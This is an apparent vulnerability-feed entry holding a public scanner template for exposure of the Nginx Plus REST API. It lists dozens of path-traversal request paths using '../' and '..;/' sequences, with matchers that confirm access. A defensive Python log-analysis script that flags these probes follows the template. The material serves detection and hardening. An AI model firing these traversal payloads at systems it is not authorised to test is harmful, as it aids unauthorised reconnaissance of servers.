nginx-api-traversal: Nginx Plus Rest API - Traversal

Date: 2025-08-01 | Affected software: nginx-api-traversal | PoC: public

Vulnerability description

Access to Nginx Plus Rest API was discovered.

PoC code [public]

id: nginx-api-traversal

info:
  name: Nginx Plus Rest API - Traversal
  author: encodedguy
  severity: high
  description: |
    Access to Nginx Plus Rest API was discovered.
  reference:
    - https://nginx.org/en/docs/http/ngx_http_api_module.html
    - https://x.com/akshaysharma71/status/1825815869953552844
  metadata:
    verified: true
  tags: nginx,fuzz,misconfig,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    payloads:
      paths:
        - "/api/1/nginx"
        - "/api/2/nginx"
        - "/api/3/nginx"
        - "/api/5/nginx"
        - "/api/9/nginx"
        - "/../../../../../../api/1/nginx"
        - "/../../../../../../api/2/nginx"
        - "/../../../../../../api/3/nginx"
        - "/../../../../../../api/5/nginx"
        - "/../../../../../../api/9/nginx"
        - "/../../../../../api/1/nginx"
        - "/../../../../../api/2/nginx"
        - "/../../../../../api/3/nginx"
        - "/../../../../../api/5/nginx"
        - "/../../../../../api/9/nginx"
        - "/../../../../api/1/nginx"
        - "/../../../../api/2/nginx"
        - "/../../../../api/3/nginx"
        - "/../../../../api/5/nginx"
        - "/../../../../api/9/nginx"
        - "/../../../api/1/nginx"
        - "/../../../api/2/nginx"
        - "/../../../api/3/nginx"
        - "/../../../api/5/nginx"
        - "/../../../api/9/nginx"
        - "/../../api/1/nginx"
        - "/../../api/2/nginx"
        - "/../../api/3/nginx"
        - "/../../api/5/nginx"
        - "/../../api/9/nginx"
        - "/../api/1/nginx"
        - "/../api/2/nginx"
        - "/../api/3/nginx"
        - "/../api/5/nginx"
        - "/../api/9/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/1/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/2/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/3/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/5/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/9/nginx"
        - "/..;/..;/..;/..;/..;/api/1/nginx"
        - "/..;/..;/..;/..;/..;/api/2/nginx"
        - "/..;/..;/..;/..;/..;/api/3/nginx"
        - "/..;/..;/..;/..;/..;/api/5/nginx"
        - "/..;/..;/..;/..;/..;/api/9/nginx"
        - "/..;/..;/..;/..;/api/1/nginx"
        - "/..;/..;/..;/..;/api/2/nginx"
        - "/..;/..;/..;/..;/api/3/nginx"
        - "/..;/..;/..;/..;/api/5/nginx"
        - "/..;/..;/..;/..;/api/9/nginx"
        - "/..;/..;/..;/api/1/nginx"
        - "/..;/..;/..;/api/2/nginx"
        - "/..;/..;/..;/api/3/nginx"
        - "/..;/..;/..;/api/5/nginx"
        - "/..;/..;/..;/api/9/nginx"
        - "/..;/..;/api/1/nginx"
        - "/..;/..;/api/2/nginx"
        - "/..;/..;/api/3/nginx"
        - "/..;/..;/api/5/nginx"
        - "/..;/..;/api/9/nginx"
        - "/..;/api/1/nginx"
        - "/..;/api/2/nginx"
        - "/..;/api/3/nginx"
        - "/..;/api/5/nginx"
        - "/..;/api/9/nginx"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "version"
          - "build"
          - "address"
          - "load_timestamp"
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205b8d017b0046535e527818c1f26ff7ed92a7818d31c92169a46be945e88b5917022100f11c5c02d1e6ee86712f319728904dc988fbff149b816b4f1e854ae3285c3430:922c64590222798bb761d5b6d8e72950
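
A defender-side check for the request patterns in the template above, added here as an example and not part of the original template or of the nginx project: it normalizes each logged request path (percent-decoding, dropping `;` path parameters, resolving `..`) and flags requests that land on `/api/<version>/nginx`. It assumes the combined access-log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line and status as they appear in a combined-format access log (assumed format).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
API_RE = re.compile(r'^/api/\d+/nginx(/|$)')

def normalize(target):
    """Decode the path, drop ';params' from each segment, resolve dot segments."""
    out = []
    for seg in unquote(urlsplit(target).path).split("/"):
        seg = seg.split(";", 1)[0]          # "..;" is treated as ".."
        if seg == "..":
            if out:
                out.pop()                   # never climb above the root
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)

def classify(line):
    """Return None, or (normalized_path, used_traversal, status) for API requests."""
    m = LOG_RE.search(line)
    if not m:
        return None
    raw = m.group("target")
    norm = normalize(raw)
    if not API_RE.match(norm):
        return None
    return norm, ".." in unquote(raw), int(m.group("status"))

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Aug/2025:10:00:00 +0000] "GET /api/9/nginx HTTP/1.1" 200 312 "-" "-"',
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /..;/..;/api/5/nginx HTTP/1.1" 404 153 "-" "-"',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /../../api/3/nginx HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.4 - - [01/Aug/2025:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]

def report(lines):
    """Label each API request: a 200 needs follow-up, anything else is a probe."""
    hits = [c for c in map(classify, lines) if c]
    return [(p, t, "responded_200" if s == 200 else "probe") for p, t, s in hits]

if __name__ == "__main__":
    for row in report(SAMPLE):
        print(row)
```

A `responded_200` row only mirrors the template's status matcher; the access log does not show the response body, so confirm against the `location` block that enables the `api` directive and restrict it with `allow`/`deny` or authentication.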